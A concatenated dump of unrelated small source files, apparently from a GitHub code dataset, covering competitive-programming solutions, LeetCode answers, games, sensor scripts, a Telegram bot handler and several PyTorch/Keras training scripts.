cur,nex = a,tmp
ei = exp(2j*pi*i*sign/sz)
w = 1
for j in range(0,sz,i):
for k in range(i):
nex[j+k] = cur[((j<<1)&mask)+k] + w*cur[(((j<<1)+i)&mask)+k]
w *= ei
p += 1
i >>= 1
if p&1:
a,tmp = tmp,a
if inv:
a = list(map(lambda x: x/sz, a))
return a
sz = 1<<(len(a)+len(b)-2).bit_length()
a = a + [0]*(sz-len(a))
b = b + [0]*(sz-len(b))
fa = fft(a,sz)
fb = fft(b,sz)
fafb = [fai*fbi for fai,fbi in zip(fa,fb)]
ab = fft(fafb,sz,inv=True)
return [round(x.real) for x in ab[:len(a)+len(b)-1]]
N,M = II()
A = III()
h = [0]*(max(A))
for a in A:
h[a-1] += 1
conv = [0,0] + convolution(h,h)
ans = 0
for k in range(2,2*max(A)+1)[::-1]:
if conv[k]<M:
ans += k*conv[k]
M -= conv[k]
else:
ans += k*M
break
print(ans) | Aasthaengg/IBMdataset | Python_codes/p02821/s153574787.py | s153574787.py | py | 1,794 | python | en | code | 0 | github-code | 90 |
44179403050 | # -----------------------------------------------------------
# 424. Longest Repeating Character Replacement
# You are given a string s and an integer k. You can choose any character of the string and change it to any other uppercase English character. You can perform this operation at most k times.
# Return the length of the longest substring containing the same letter you can get after performing the above operations.
# Example 1:
# Input: s = "ABAB", k = 2
# Output: 4
# Explanation: Replace the two 'A's with two 'B's or vice versa.
# Example 2:
# Input: s = "AABABBA", k = 1
# Output: 4
# Explanation: Replace the one 'A' in the middle with 'B' and form "AABBBBA".
# The substring "BBBB" has the longest repeating letters, which is 4.
# -----------------------------------------------------------
from typing import List
import collections
# Inital Solution
# O(mn) time where m is the number of unique characters and n is the length of the string
# Slow sliding window
class Solution:
def characterReplacement(self, s: str, k: int) -> int:
start, end, highest, count = 0, 0, 0, 0
# window capture section of same char string
# go down, with tolerance of k times
# store highest and go back to first time its different
# dictionary to store first time
a = [0] * 26
for x in s:
if a[ord(x) - ord("A")] == 0:
a[ord(x) - ord("A")] = 1
for ind, n in enumerate(a):
if n == 0:
continue
i = chr(ord("A") + ind)
count = 0
end = 0
start = 0
while end < len(s):
# case where you continue the trek since same char
highest = max(highest, end-start)
if s[end] == i:
end += 1
else:
# if we havent used up all k
if count < k:
end += 1
count += 1
continue
else:
# first save highest value
while start < end and count >= k:
if s[start] != i:
count -= 1
start += 1
if start == end:
start += 1
end += 1
highest = max(highest, end-start)
return highest
class Solution:
def characterReplacement(self, s: str, k: int) -> int:
# Use the size of the window to track the longest substring
# We want to shows if there are more characters in the substring after k replacements than the highest frequency char.
# These additional characters are different than the highest frequency char, so the substring is not valid
# We expand the window if the size of the window with replacements is <= current important char, else don't expand and shift forward
freq = collections.defaultdict(int)
left, right, highest = 0, 0, 0
while right < len(s):
freq[s[right]] += 1
highest = s[right] if freq[s[right]] > freq[highest] else highest
if (right - left) + 1 - k <= freq[highest]:
right += 1
else:
right += 1
freq[s[left]] -= 1
left += 1
return right - left
| a22yuen/DSA | 3-sliding-windows/424-longest-repeating-character-replacement.py | 424-longest-repeating-character-replacement.py | py | 3,467 | python | en | code | 2 | github-code | 90 |
30883881674 | import csv
def ow_iter_sensory(fn):
with open(fn) as fh:
for row in csv.DictReader(fh):
neuron = row['Neuron']
_sense = row['Landmark']
_type = row['Neurotransmitter']
yield neuron, _type, _sense
def ow_iter_connectome(fn):
with open(fn) as fh:
for row in csv.DictReader(fh):
_type = row['Neurotransmitter'] # Generic_GJ | Dopamine | Glutamate | Serotonin | FMRFamide | Acetylcholine
_type2 = row['Type'] # GapJunction | Send
_nrconn = int(row['Number of Connections'])
yield (row['Origin'], row['Target']), (_type, _type2), int(_nrconn)
def ow_iter_muscle(fn):
with open(fn) as fh:
for row in csv.DictReader(fh):
_type = row['Neurotransmitter']
_nrconn = int(row['Number of Connections'])
yield (row['Neuron'], row['Muscle']), _type, int(_nrconn)
| obogames/wyrm | connectome/readers/openworm.py | openworm.py | py | 927 | python | en | code | 2 | github-code | 90 |
14770582542 | n = int(input())
ans = 0
for i in range(n):
s = input()
flag = True
m = len(s)
for j in range(m):
if s[j] != s[(m-1)-j]:
flag = False
if flag:
ans += 1
print(ans) | kaneda05/algo | 1/full_search/4/5.py | 5.py | py | 211 | python | en | code | 0 | github-code | 90 |
23540232784 | from turtle import Turtle
FONT1 = ("Courier", 24, "normal")
FONT2 = ("Courier", 18, "normal")
class ScoreBoard(Turtle):
def __init__(self):
super().__init__()
self.level = 1
self.penup()
self.pencolor("black")
self.goto(-270, 250)
self.write_score()
self.hideturtle()
def level_up(self):
self.level += 1
self.write_score()
def write_score(self):
self.clear()
self.write(arg=f'Level: {self.level}', font=FONT1, align="left")
def game_over(self):
self.clear()
self.goto(0, 0)
self.write(
arg=f'GAME OVER\nYour Score: {self.level}', font=FONT1, align="center")
| hantn16/100daysPython | turtle_crossing/scoreboard.py | scoreboard.py | py | 703 | python | en | code | 0 | github-code | 90 |
38918059026 | import logging
from typing import Iterable, List
import numpy as np
from sklearn.model_selection import train_test_split
from torch.utils.data import DataLoader
from src.data.datasets import TorchTransformableSubset, TorchImageDataset
class BaseDataHandler(object):
def __init__(
self,
dataset: TorchImageDataset,
batch_size: int = 64,
num_workers: int = 10,
transformation_dicts: List[dict] = None,
random_state: int = 42,
drop_last_batch: bool = True,
):
self.dataset = dataset
self.batch_size = batch_size
self.num_workers = num_workers
self.transformation_dicts = transformation_dicts
self.random_state = random_state
self.drop_last_batch = drop_last_batch
class DataHandler(BaseDataHandler):
def __init__(
self,
dataset: TorchImageDataset,
batch_size: int = 64,
num_workers: int = 10,
transformation_dicts: List[dict] = None,
random_state: int = 42,
drop_last_batch: bool = True,
):
super().__init__(
dataset=dataset,
batch_size=batch_size,
num_workers=num_workers,
transformation_dicts=transformation_dicts,
random_state=random_state,
drop_last_batch=drop_last_batch,
)
self.train_val_test_datasets_dict = None
self.data_loader_dict = None
def stratified_train_val_test_split(self, splits: Iterable) -> None:
train_portion, val_portion, test_portion = splits[0], splits[1], splits[2]
indices = np.array(list(range(len(self.dataset))))
labels = np.array(self.dataset.labels)
train_and_val_idc, test_idc = train_test_split(
indices,
test_size=test_portion,
stratify=labels,
random_state=self.random_state,
)
train_idc, val_idc = train_test_split(
train_and_val_idc,
test_size=val_portion / (1 - test_portion),
stratify=labels[train_and_val_idc],
random_state=self.random_state,
)
logging.debug(
"Data split on FoV image level ( {} training images, {} validation images,"
" {} test images).".format(len(train_idc), len(val_idc), len(test_idc))
)
train_dataset = TorchTransformableSubset(
dataset=self.dataset, indices=train_idc
)
val_dataset = TorchTransformableSubset(dataset=self.dataset, indices=val_idc)
test_dataset = TorchTransformableSubset(dataset=self.dataset, indices=test_idc)
self.train_val_test_datasets_dict = {
"train": train_dataset,
"val": val_dataset,
"test": test_dataset,
}
logging.debug(
"Training samples: {}, validation samples: {}, test samples: {}.".format(
len(train_idc), len(val_idc), len(test_idc)
)
)
def get_data_loader_dict(self, shuffle: bool = True,) -> None:
if self.transformation_dicts is not None:
if len(self.transformation_dicts) > 0:
for k in self.transformation_dicts[0].keys():
self.train_val_test_datasets_dict[k].set_transform_pipeline(
[
self.transformation_dicts[i][k]
for i in range(len(self.transformation_dicts))
]
)
data_loader_dict = {}
for k, dataset in self.train_val_test_datasets_dict.items():
data_loader_dict[k] = DataLoader(
dataset=dataset,
batch_size=self.batch_size,
shuffle=shuffle and k == "train",
num_workers=self.num_workers,
drop_last=self.drop_last_batch,
)
self.data_loader_dict = data_loader_dict
| GVS-Lab/chromark | src/helper/data.py | data.py | py | 3,925 | python | en | code | 0 | github-code | 90 |
35433823075 | from collections import Counter
class Solution:
def frequencySort(self, s: str) -> str:
c = Counter(s)
bucket = [-1]*(len(s) + 1)
for l, freq in c.items():
if bucket[freq] == -1:
bucket[freq] = []
bucket[freq].append(l)
new_s = ''
for i in range(len(s) - 1, -1, -1):
if bucket[i] != -1:
for l in bucket[i]:
new_s += l*i
return new_s
def main():
s = "tree"
res = Solution().frequencySort(s)
print(f'expected::eert, got::{res}')
if __name__ == '__main__':
main()
| kateshostak/leetcode | sort_characters_by_frequency.py | sort_characters_by_frequency.py | py | 625 | python | en | code | 0 | github-code | 90 |
30959301137 | import pygame
from plane_sprites import *
# 游戏的帧数
FRAME_PER_SEC = 120
# 创建敌机事件
CREATE_ENEMY_EVENT = pygame.USEREVENT
HERO_FIRE_EVENT = pygame.USEREVENT + 1
class PlaneGame(object):
def __init__(self):
print("游戏初始化。。。")
# 1.创建屏幕对象
self.screen = pygame.display.set_mode(SCREEN_RECT.size)
# 写窗口title
pygame.display.set_caption("飞机大战")
# 2.创建时钟对象
self.clock = pygame.time.Clock()
# 3.调用私有方法,精灵和精灵组的创建
self.__create_sprites()
# 4.设置敌机定时器事件—1s
pygame.time.set_timer(CREATE_ENEMY_EVENT, 1000)
pygame.time.set_timer(HERO_FIRE_EVENT, 500)
def __create_sprites(self):
background1 = BackGroundSprites()
background2 = BackGroundSprites(0, -SCREEN_RECT.height)
# background2.rect.y = -SCREEN_RECT.h
self.background_group = pygame.sprite.Group(background1, background2)
# 创建敌机精灵、精灵组
self.enemy_group = pygame.sprite.Group()
# 创建英雄精灵、精灵组
self.hero = Hero()
self.hero_group = pygame.sprite.Group(self.hero)
def start_game(self):
print("游戏开始了。。。")
while True:
# 1、设置刷新帧率
self.clock.tick(FRAME_PER_SEC)
# 2、事件监听
self.__event_handler()
# 3、碰撞检测
self.__check_collide()
# 5、刷新精灵
self.__update_sprites()
# 6、屏幕更新
pygame.display.update()
def __event_handler(self):
"""事件监听"""
for event in pygame.event.get():
if event.type == pygame.QUIT:
PlaneGame.__game_over()
elif event.type == CREATE_ENEMY_EVENT:
# print("敌机出现喽、、、")
enemy = Enemy()
self.enemy_group.add(enemy)
elif event.type == HERO_FIRE_EVENT:
self.hero.fire()
# 返回所有的按键元组,若某个键被按下,对应值为1
key_pressed = pygame.key.get_pressed()
if key_pressed[pygame.K_RIGHT] == 1 or key_pressed[pygame.K_d] == 1:
# print("向右移动。。。")
self.hero.speed = 2
elif key_pressed[pygame.K_LEFT] == 1 or key_pressed[pygame.K_a] == 1:
self.hero.speed = -2
else:
self.hero.speed = 0
def __check_collide(self):
"""碰撞检测"""
pygame.sprite.groupcollide(self.hero.bullets, self.enemy_group, True, True)
enemies = pygame.sprite.spritecollide(self.hero, self.enemy_group, True)
if len(enemies) > 0:
self.hero.kill()
PlaneGame.__game_over()
def __update_sprites(self):
"""更新精灵"""
self.background_group.update()
self.background_group.draw(self.screen)
self.enemy_group.update()
self.enemy_group.draw(self.screen)
self.hero_group.update()
self.hero_group.draw(self.screen)
self.hero.bullets.update()
self.hero.bullets.draw(self.screen)
@staticmethod
def __game_over():
"""游戏结束,卸载所有模块,退出游戏"""
pygame.quit()
exit()
if __name__ == '__main__':
game = PlaneGame()
game.start_game()
| xiaojie25/PlaneGame | planr_main.py | planr_main.py | py | 3,582 | python | en | code | 1 | github-code | 90 |
20732798152 | import time
from pi_sht1x import SHT1x as sht
import RPi.GPIO as GPIO
GPIO.setwarnings(False)
dat = 2
sck = 3
with sht(dat, sck, gpio_mode = GPIO.BCM) as sensor:
temperature = sensor.read_temperature()
humidity = sensor.read_humidity(temperature)
print("temperature: {}".format(temperature))
print("humidity: {}".format(humidity))
| VladTomici14/Rusty6 | code/sht.py | sht.py | py | 346 | python | en | code | 1 | github-code | 90 |
19255635685 | from sys import stdin
from collections import deque
stdin = open("./input.txt", "r")
num_of_cards = int(stdin.readline())
num_of_choose = int(stdin.readline())
cards = []
for _ in range(num_of_cards):
cards.append(int(stdin.readline()))
answer = set()
def dfs(cur_idx, visited, temp):
visited[cur_idx] = True
temp.append(cards[cur_idx])
if len(temp) < num_of_choose:
for next_idx in range(num_of_cards):
if not visited[next_idx]:
dfs(next_idx, visited, temp)
elif len(temp) == num_of_choose:
answer.add(''.join(map(str, temp)))
temp.pop()
visited[cur_idx] = False
def main():
visited = [False] * num_of_cards
for idx in range(num_of_cards):
if not visited[idx]:
dfs(idx, visited, deque())
print(len(answer))
if __name__ == '__main__':
main() | ag502/algorithm | Problem/BOJ_5568_카드 놓기/main.py | main.py | py | 860 | python | en | code | 1 | github-code | 90 |
72328682857 | from aiogram import types
from bot.common.keyboard_fabrics import (currency_cb, delete_account_cb,
lang_cb, menu_cb, notification_cb,
notification_payout_cb)
from bot.handlers.text.base_command_handler import BaseCommandHandler
from database.user_repo import UserRepository
class CmdSettings(BaseCommandHandler):
async def handle(self, message: types.Message, user: UserRepository, _: dict):
inline_keyboard_markup = types.InlineKeyboardMarkup(row_width=2)
inline_keyboard_markup.row(
types.InlineKeyboardButton(
_["delete_account"],
callback_data=delete_account_cb.new(
id="_", action="choose"
),
),
types.InlineKeyboardButton(
_['language'],
callback_data=lang_cb.new(
id="_",
),
),
)
inline_keyboard_markup.row(
types.InlineKeyboardButton(
_["notifcation_button"],
callback_data=notification_cb.new(
action="_",
),
),
types.InlineKeyboardButton(
_['change_coins_button'],
callback_data=menu_cb.new(
id="_", type="account", action="c_coins"
),
),
)
inline_keyboard_markup.row(
types.InlineKeyboardButton(
_["notifcation_payout_button"],
callback_data=notification_payout_cb.new(
action="_",
),
),
types.InlineKeyboardButton(
_["curr_list_button"],
callback_data=currency_cb.new(
action="open", id="_",
),
),
)
await message.answer(_['setting_descr'], reply_markup=inline_keyboard_markup)
__call__ = handle
| Forevka/Emcd | bot/handlers/text/settings_command.py | settings_command.py | py | 2,029 | python | en | code | 2 | github-code | 90 |
20538273416 | # libraries
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from requests import head
import seaborn as sns
# # set seaborn style
# sns.set_theme()
# df = pd.read_csv ('vuln-versions.csv')
# # print(df)
# #print(df[df.columns[1]])
# # Data
# x=range(1,183)
# df[df.columns[2]] = df[df.columns[2]].replace(0,1)
# # print(df)
# diff = df[df.columns[1]].sub(df[df.columns[2]], fill_value=0)
# y=[ diff, df[df.columns[2]]]
# print(y)
# # Plot
# #ax = plt.stackplot(x,y, labels=['Not vulnerable','Vulnerable'])
# fig, ax = plt.subplots()
# ax.bar(x, diff, label='Not affected',edgecolor = "none")
# ax.bar(x, df[df.columns[2]], bottom=diff, label='Affected',edgecolor = "none")
# plt.legend(loc='upper left')
# plt.xlabel("Packages", labelpad=10)
# plt.ylabel("Number of versions", labelpad=10)
# plt.ylim([0,100])
# plt.tight_layout()
# plt.savefig("versions-surface.pdf")
df1 = pd.read_csv ('vuln-versions_prototype-pollution.csv', header=None)
df1.columns=['name','not_vulnerable','vulnerable']
# print(df1)
df1 = df1[df1['vulnerable']!=0]
print(len(df1))
df1 = df1.drop_duplicates(subset=['name'])
print(len(df1))
# df_tmp = df1[df1['vulnerable']==0]
# print(df_tmp['name'].tolist())
# print(len(df_tmp['name'].tolist()))
df2 = pd.read_csv ('vuln-versions_redos.csv', header=None)
df2.columns=['name','not_vulnerable','vulnerable']
# print(df)
df2 = df2[df2['vulnerable']!=0]
print(len(df2))
df2 = df2.drop_duplicates(subset=['name'])
print(len(df2))
# df_tmp = df2[df2['vulnerable']==0]
# print(df_tmp['name'].tolist())
# print(len(df_tmp['name'].tolist()))
df3 = pd.read_csv ('vuln-versions_ace-breakout.csv', header=None)
df3.columns=['name','not_vulnerable','vulnerable']
df3 = df3[df3['vulnerable']!=0]
print(len(df3))
df3 = df3.drop_duplicates(subset=['name'])
print(len(df3))
df4 = pd.read_csv ('vuln-versions_command-injection.csv', header=None)
df4.columns=['name','not_vulnerable','vulnerable']
# print(df)
df4 = df4[df4['vulnerable']!=0]
print(len(df4))
df4 = df4.drop_duplicates(subset=['name'])
print(len(df4))
df5 = pd.read_csv ('vuln-versions_path-traversal.csv', header=None)
df5.columns=['name','not_vulnerable','vulnerable']
# print(df1)
df5 = df5[df5['vulnerable']!=0]
print(len(df5))
df5 = df5.drop_duplicates(subset=['name'])
print(len(df5))
df = pd.concat([df1, df2,df3,df4,df5])
df = df[df['vulnerable']!=0]
print(len(df))
df['total']=df.loc[:,['not_vulnerable','vulnerable']].sum(axis=1)
df = df.sort_values(by=['total'])
# print(df)
import matplotlib.pyplot as plt
import seaborn as sns
#set seaborn plotting aesthetics
sns.set(style='white')
# fig, ax = plt.subplots()
# ax = df.set_index('name').plot(kind='bar', stacked=True)
# a=np.arange(0,len(df), 25)
# ax.set_xticks(a)
# ax.set_xticklabels(a)
# plt.legend(loc='upper left')
# plt.xlabel("Packages", labelpad=10)
# plt.ylabel("Number of versions", labelpad=10)
# # plt.ylim([0,100])
# plt.tight_layout()
# # plt.savefig("versions-surface.pdf")
# plt.show()
# df = pd.read_csv ('vuln-versions.csv')
# # print(df)
# #print(df[df.columns[1]])
# # Data
x=range(len(df))
# df[df.columns[2]] = df[df.columns[2]].replace(0,1)
# print(df)
diff = df['not_vulnerable']
# y=[ diff, df[df.columns[2]]]
# print(y)
import seaborn as sns
import matplotlib.pyplot as plt
sns.set()
sns.set_style("whitegrid")
sns.set_palette("Set2")
plt.rcParams["figure.figsize"] = (16, 5)
fig, ax = plt.subplots()
font_size = 30
legend_font_size = 24
ax.bar(x, df['not_vulnerable'], label='Not affected',edgecolor = "none")
ax.bar(x, df['vulnerable'], bottom=diff, label='Affected',edgecolor = "none")
plt.legend(loc='upper left')
plt.xlabel("Packages", labelpad=10)
a=np.arange(0,len(df),30)
a= np.append(a,[len(df)], axis=0)
# print(a)
ax.set_xticks(a)
b=np.arange(0,len(df),30)
b= np.append(b,[len(df)], axis=0)
b = np.delete(b, 0, 0)
b = np.insert(b, 0, 1)
ax.set_xticklabels(b)
ax.set_ylabel("Number of versions", fontsize=font_size, labelpad=20)
ax.set_xlabel("Packages", fontsize=font_size, labelpad=20)
ax.set_ylim(0,100)
ax.tick_params(axis='both', which='major')
ax.tick_params(axis='y', which='major', labelsize=legend_font_size)
ax.tick_params(axis='x', which='major', labelsize=legend_font_size, rotation=90)
ax.grid("both")
# plt.legend(bbox_to_anchor=(0,1.02,1,0.2), loc="lower left",
# mode="expand", borderaxespad=0, ncol=2)
plt.setp(ax.get_legend().get_texts(), fontsize=font_size)
plt.subplots_adjust(top=0.91, right=0.99, bottom=.32)
plt.tight_layout()
# plt.savefig("versions-surface.pdf")
plt.show() | cristianstaicu/SecBench.js | analyses/graphs/versions-histogram.py | versions-histogram.py | py | 4,536 | python | en | code | 23 | github-code | 90 |
18187213413 | import unittest
from src.which_are_in import in_array
class TestWhichAreIn(unittest.TestCase):
def test_which_are_in(self):
a1 = ["live", "arp", "strong"]
a2 = ["lively", "alive", "harp", "sharp", "armstrong"]
r = ['arp', 'live', 'strong']
self.assertEqual(in_array(a1, a2), r)
if __name__ == '__main__':
unittest.main()
| n1kk0/katas | python/test/test_which_are_in.py | test_which_are_in.py | py | 367 | python | en | code | 0 | github-code | 90 |
33573806441 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Jun 5 12:56:03 2023
@author: zevfine
"""
def madlib(filename):
'''reads a madlib and asks for the inputs'''
fn = open(filename,'r')
txt = fn.read()
word_list = txt.split(' ')
print(word_list)
for i in range(len(word_list)):
word = word_list[i]
if '(' in word:
print(word)
front = False
back = False
if word[0] == '(':
part = word[1:-1]
if '_' in part:
part = part.replace("_", ' ')
if part[0] in 'aeiou':
replacment = str(input('Enter an ' + str(part) + ':'))
else:
replacment = str(input('Enter a ' + str(part) + ':'))
word_list[i] = replacment
string = (' '.join(list))
return string | ZevFine/Personal-Projects | madlibs.py | madlibs.py | py | 846 | python | en | code | 0 | github-code | 90 |
16470745930 | # Bucket Sort - O(n)
def bucket_sort(lst):
# Find the maximum value in the list and calculate the bucket size
max_value = max(lst)
bucket_size = max_value / len(lst)
# Create an empty list of buckets
buckets = [[] for _ in range(len(lst))]
# Put each element in its corresponding bucket
for num in lst:
index = int(num / bucket_size)
if index >= len(buckets):
index = len(buckets) - 1
buckets[index].append(num)
# Sort each bucket individually
for i in range(len(lst)):
buckets[i] = insertion_sort(buckets[i])
# Concatenate the sorted buckets and return the result
return [num for bucket in buckets for num in bucket]
def insertion_sort(lst):
# Traverse through all list elements
for i in range(1, len(lst)):
key = lst[i]
j = i - 1
# Move elements of the list greater than key to one position ahead of their current position
while j >= 0 and key < lst[j]:
lst[j + 1] = lst[j]
j -= 1
lst[j + 1] = key
# Return the sorted list
return lst | ItemHunt/Data-Structures-and-Algorithms | algorithms/sort/bucket_sort.py | bucket_sort.py | py | 1,111 | python | en | code | 0 | github-code | 90 |
21404773528 | import os
import pathlib
import re
import sys, getopt
import json
from tqdm import tqdm
def run(fname, max_len, min_word_num):
inputFileName = fname
outputFileName = fname.split('.')[0]+'.json' #+ '/out'
#if not os.path.exists(pathout):
# os.makedirs(pathout)
out_list=[]
curr_string=""
with open(inputFileName, "r") as in_file:
with tqdm(in_file) as pbar:
for line in pbar:
if line[:11]=="# newdoc id":
if not curr_string=="":
out_list.append(curr_string.strip())
curr_string=""
if line[:9]=="# text = ":
text = clean_string(line[9:])
if len(curr_string) + len(line) <= max_len and text.count(' ') >= min_word_num-1:
curr_string += text
with open(outputFileName, "w") as out_file:
jsonString = json.dumps(out_list,indent=2,ensure_ascii=False)
out_file.write(jsonString)
def clean_string(s):
for c in s:
if not c in list("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789.,?!();:-–—%\"'„”’… séáőúűíöüóÉÁŐÚŰÍÖÜÓ\n"):
#print(c, s)
return ""
return s.replace('„','"').replace('”','"').replace('’',"'").replace('…',"...").replace('–',"-").replace('—',"-")
def main(argv):
fname=""
max_len=500
min_word_num=2
try:
opts, args = getopt.getopt(argv,"hf:m:")
except getopt.GetoptError:
print('rename.py -f <fname> -m <max_len per doc>')
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print('run_tests.py -f <fname> -m <max_len per doc>')
sys.exit()
elif opt in ("-f"):
fname = arg
elif opt in ("-m"):
max_len = int(arg)
run(fname,max_len,min_word_num)
if __name__ == "__main__":
main(sys.argv[1:]) | ntvuong/Diacritics_Vietnamese | webcorpus_2/get_text.py | get_text.py | py | 2,005 | python | en | code | 1 | github-code | 90 |
10726482272 | nums = [int(num.strip()) for num in open('aoc2019/inputs/1.txt').readlines()]
def calc_fuel(mass):
return (mass//3)-2
def rec_fuel(mass):
fuel = calc_fuel(mass)
if fuel < 0:
return 0
else:
return fuel + rec_fuel(fuel)
total_fuel = sum([calc_fuel(mass) for mass in nums])
print(total_fuel)
total_rec_fuel = sum([rec_fuel(mass) for mass in nums])
print(total_rec_fuel)
| FjeldMats/AdventOfCode | aoc2019/day1.py | day1.py | py | 406 | python | en | code | 1 | github-code | 90 |
19797178484 | #!/usr/bin/python
# -*-coding:utf8-*-
"""
@author: LieOnMe
@time: 2019/7/27 17:07
"""
import os
import tensorflow as tf
from tensorflow import keras
from utils import conf
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
PROJ_PATH = conf.get_project_path()
def pre_process(x, y):
# [0-255] => [-1, 1]
x = 2 * tf.cast(x, dtype=tf.float32) / 255 - 1.
y = tf.cast(y, dtype=tf.int32)
y = tf.squeeze(y)
y = tf.one_hot(y, depth=10)
return x, y
data_path = os.path.normpath(os.path.join(PROJ_PATH, 'data/cifar/cifar-10-python.tar.gz'))
print(data_path)
(x, y), (x_test, y_test) = keras.datasets.cifar10.load_data()
print(x.shape, y.shape)
print(x_test.shape, y_test.shape)
batch_size = 64
db = tf.data.Dataset.from_tensor_slices((x, y))
db = db.map(pre_process).shuffle(10000).batch(batch_size)
db_val = tf.data.Dataset.from_tensor_slices((x_test, y_test))
db_val = db_val.map(pre_process).batch(batch_size)
db_iter = iter(db)
sample = next(db_iter)
print("Sample shape: ", sample[0].shape, sample[1].shape)
class MyDense(keras.layers.Layer):
def __init__(self, inp_dim, outp_dim):
super(MyDense, self).__init__()
self.kernel = self.add_variable('w', [inp_dim, outp_dim])
# self.bias = self.add_variable('b', [outp_dim])
def call(self, inputs, **kwargs):
out = inputs @ self.kernel
return out
def compute_output_signature(self, input_signature):
pass
class MyNetwork(keras.Model):
def __init__(self):
super(MyNetwork, self).__init__()
self.fc1 = MyDense(32 * 32 * 3, 256)
self.fc2 = MyDense(256, 128)
self.fc3 = MyDense(128, 64)
self.fc4 = MyDense(64, 32)
self.fc5 = MyDense(32, 10)
def call(self, inputs, training=None, mask=None):
"""
:param inputs: [b, 32, 32, 3]
:param training:
:param mask:
:return:
"""
x = tf.reshape(inputs, [-1, 32 * 32 * 3])
x = self.fc1(x)
x = tf.nn.relu(x)
x = self.fc2(x)
x = tf.nn.relu(x)
x = self.fc3(x)
x = tf.nn.relu(x)
x = self.fc4(x)
x = tf.nn.relu(x)
x = self.fc5(x)
return x
def compute_output_signature(self, input_signature):
pass
network = MyNetwork()
network.compile(keras.optimizers.Adam(lr=1e-3),
loss=tf.losses.CategoricalCrossentropy(from_logits=True),
metrics=['accuracy'])
network.fit(db, epochs=15, validation_data=db_val, validation_freq=1)
weight_store_path = os.path.normpath(os.path.join(PROJ_PATH, 'out/cifar10')) + '\\weights.cpkt'
network.save_weights(weight_store_path)
del network
print('saved to weight.ckpt')
network = MyNetwork()
network.compile(keras.optimizers.Adam(lr=1e-3),
loss=tf.losses.CategoricalCrossentropy(from_logits=True),
metrics=['accuracy'])
network.load_weights(weight_store_path)
print('load weight')
network.evaluate(db_val) | kaisayi/bordercollie | src/model/cifar10_train.py | cifar10_train.py | py | 2,968 | python | en | code | 0 | github-code | 90 |
16744181813 | import numpy as np
import matplotlib.pyplot as plt
Data= np.genfromtxt('planetas.txt')
x = Data[:,0]
y = Data[:,1]
plt.plot(x,y)
plt.grid()
plt.savefig('Graph.png')
| SebastianSebz/SebastianSuarez_Ejercicio25 | graph.py | graph.py | py | 188 | python | en | code | 0 | github-code | 90 |
18378251989 | s=input()
n=len(s)
f=0
for i in range(n-1):
if(s[i]==s[i+1]):
f=1
break
if(f==1):
print("Bad")
else:
print("Good")
| Aasthaengg/IBMdataset | Python_codes/p02993/s104363473.py | s104363473.py | py | 144 | python | en | code | 0 | github-code | 90 |
7883566691 | from tensorflow.keras.models import Model
from tensorflow.keras.layers import Input, Conv2D, MaxPool2D, LSTM, Reshape, Dense, Dropout
from load_data import *
batch_size = 1
inputs = Input(shape = (sampled_data.shape[1],sampled_data.shape[2],sampled_data.shape[3]), batch_size = batch_size)
conv2d_1 = Conv2D(filters = 32, kernel_size = (3,3), strides = 1, padding = "same", activation='relu')(inputs)
conv2d_1 = MaxPool2D(pool_size = (2,2), padding = "same")(conv2d_1)
conv2d_1 = Dropout(.3)(conv2d_1)
conv2d_2 = Conv2D(filters = 64, kernel_size = (3,3), strides = 1, padding = "same", activation='relu')(conv2d_1)
conv2d_2 = MaxPool2D(pool_size = (2,2), padding = "same")(conv2d_2)
conv2d_2 = Dropout(.3)(conv2d_2)
reshape = Reshape((222, -1))(conv2d_2)
lstm = LSTM(200, return_sequences = False)(reshape)
dense_1 = Dense(64, activation = "relu")(lstm)
dense_2 = Dense(32, activation = "relu")(dense_1)
outputs = Dense(len(set(labels)), activation = "softmax")(dense_2)
rcnn = Model(inputs, outputs)
rcnn.compile(loss='sparse_categorical_crossentropy',optimizer='adam',metrics=['accuracy'])
rcnn.summary()
rcnn.fit(X_train, y_train, epochs=10, batch_size=1, validation_data=(X_val, y_val)) | riyandrika/speech-recognition | RCNN.py | RCNN.py | py | 1,227 | python | en | code | 0 | github-code | 90 |
18503603299 | def check(n):
count = 0
for i in range(1, n + 1):
if(n % i == 0):
count += 1
if(count == 8 and n % 2 != 0):
return True
else:
return False
n = int(input())
count = 0
for i in range(1, n + 1):
if(check(i)):
count += 1
print(count)
| Aasthaengg/IBMdataset | Python_codes/p03281/s441326841.py | s441326841.py | py | 296 | python | en | code | 0 | github-code | 90 |
73246470376 | import torch.nn as nn
import torch
class Config:
def __init__(self):
self.data_path = 'Pheme.csv'
self.batch_size = 64
self.min_freq = 0
self.pad_length = 80
self.embedding_path = '../../Glove_Twitter_wordVec/glove.twitter.27B.200d.txt'
self.embed_size = 200
self.num_hiddens = 128
self.num_layers = 2
self.num_classes = 2
self.num_epochs = 10
self.learning_rate = 1e-5
self.saved_path = 'model2.ckpt'
'''
embedding:
Input: (vocab_size, embed_size), i.e., len(embeds), glove_vecs_dim
Output: (batch_size, padding_length, word_dims)
'''
class BiLstm(nn.Module):
def __init__(self, vocab_size, embed_size, num_hiddens, num_layers, num_classes):
super(BiLstm, self).__init__()
self.embedding = nn.Embedding(vocab_size, embed_size)
self.encoder = nn.LSTM(embed_size, num_hiddens, num_layers=num_layers, bidirectional=True)
self.decoder = nn.Linear(num_hiddens * 4, num_classes) # 2 * 2 == 4
def forward(self, x):
embeddings = self.embedding(x.T)
# for faster storing
self.encoder.flatten_parameters()
out, _ = self.encoder(embeddings)
# Only get the latest hidden state
out = self.decoder(torch.cat((out[0], out[-1]), dim = 1))
return out
def init_weights(m):
if type(m) == nn.Linear:
nn.init.xavier_normal_(m.weight)
if type(m) == nn.LSTM:
for param in m._flat_weights_names:
if "weight" in param:
nn.init.xavier_uniform_(m._parameters[param])
| andr2w/Malicious-Attack | TextFooler/model.py | model.py | py | 1,652 | python | en | code | 1 | github-code | 90 |
27984965602 | import numpy as np
import pdb
import torch.nn as nn
import torch
import time
from at5k_1.write_file import write_weight_b
def wr_str(str): # parameter
f = open('E:/AT5000/AT5K_Pytorch_2/Pytorch_Retinaface_master/at5k_1/model_txt/model.txt', 'a')
f.write(str)
f.write('\n')
f.close()
class cal_l:
def __init__(self, n=1):
self.n = n
def __call__(self):
last_idx = self.n
self.n += 1
next_idx = self.n
return '//layer' + str(last_idx)
def serializeWeight(data, Csize=8, Ksize=8):
result = []
#
# if data.shape[2] < Csize:
